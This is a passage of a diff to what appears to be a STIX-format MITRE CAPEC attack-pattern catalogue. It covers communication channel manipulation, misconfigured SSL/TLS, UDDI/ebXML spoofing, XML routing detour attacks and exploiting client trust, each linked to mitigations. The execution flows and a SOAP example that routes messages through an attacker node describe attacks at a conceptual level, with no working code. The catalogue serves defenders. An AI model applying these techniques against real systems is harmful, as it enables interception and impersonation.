"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3205de43-5293-4d4e-9d84-74590957951a", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3fad702-176c-4e46-ad84-47ac9e37f083", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f23b69e-8624-4f1f-b185-f98b16b4714f", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3df53c6f-ed1d-45c8-9248-169adc95cc23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72a7c6c-d377-4769-b5de-86fe57fc39cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6b5101-4c5f-42e5-9d3c-ebee7b25bae7", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", + "external_references": [ + { + "external_id": "CAPEC-216", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/216.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Communication Channel Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel's confidentiality.)" + ], + "Integrity": [ + "Read Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Modify Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Other (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt all sensitive communications using properly-configured cryptography.", + "id": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c654fbc8-bc2b-454c-9398-3918f016c72b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "spec_version": "2.1", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4825728c-cd47-4e1a-a705-02257ab81012", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "spec_version": "2.1", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

    2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

    2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

    2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--a016c6dd-9ad2-4313-a1ac-feb6f4d5c593", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0973ae1-9f6a-4c40-9fea-2a3ee0e97625", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a016c6dd-9ad2-4313-a1ac-feb6f4d5c593", + "spec_version": "2.1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only use TLS version 1.2+, as versions 1.0 and 1.1 are insecure.", + "id": "course-of-action--5a4ac34c-6d63-45ca-a2e5-260d4d0b39f1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce247393-b0a0-45b2-ab0c-e4822c35f2fc", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a4ac34c-6d63-45ca-a2e5-260d4d0b39f1", + "spec_version": "2.1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure TLS to use secure algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and SHA384 for the most security.", + "id": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ade11c3-680d-4f17-9cad-323b3972dc32", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "spec_version": "2.1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", + "external_references": [ + { + "external_id": "CAPEC-218", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/218.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + } + ], + "id": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spoofing of UDDI/ebXML Messages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.", + "id": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-218-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46bb69df-9433-4e40-8785-079dcc99916b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", + "external_references": [ + { + "external_id": "CAPEC-219", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/219.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-610", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/610.html" + }, + { + "description": "Routing Detour", + "external_id": "32", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Routing-Detour" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-80", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246956/Routing-Detour" + }, + { + "description": "Andre Yee, Threat Protection in a Service Oriented World, NFR Security", + "external_id": "REF-81", + "source_name": "reference_from_CAPEC", + "url": "http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + } + ], + "id": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Routing Detour Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n Example SOAP message with routing information in header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router \n \n ...\n \n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n http://example2.com/router\n \n http://example3.com/router\n \n Resulting in the following SOAP Header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://example3.com/router\n \n ...\n \n Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.\n Example of WS-Referral based WS-Routing injection of the bogus node route:\n \n http://example2.com/router\n \n http://evilsite1.com/router\n \n Resulting XML Routing Detour attack:\n \n http://example_0.com/\n http://example_4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://evilesite1.com/router\n http://example3.com/router\n \n ...\n \n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

    2. Techniques
    Use automated tool to record all instances to process XML requests or find exposed WSDL.
    Use tools to crawl WSDL

Experiment

  1. Identify SOAP messages that have multiple state processing.: Inspect instance to see whether the XML processing has multiple stages or not.

    2. Techniques
    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

Exploit

  1. Launch an XML routing detour attack: The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

    2. Techniques
    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted system must have multiple stages processing of XML content." + ], + "x_capec_resources_required": [ + "The attacker must be able to insert or compromise a system into the processing path for the transaction." + ], + "x_capec_skills_required": { + "Low": "To inject a bogus node in the XML routing table" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", + "id": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50e9645d-eacc-4146-b4c7-2d3fccb9d553", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "spec_version": "2.1", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", + "id": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad2e36bd-7078-49d5-84e3-b333131d9839", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "spec_version": "2.1", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", + "id": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef29ae67-0988-4232-84e9-43b9c15d46eb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + 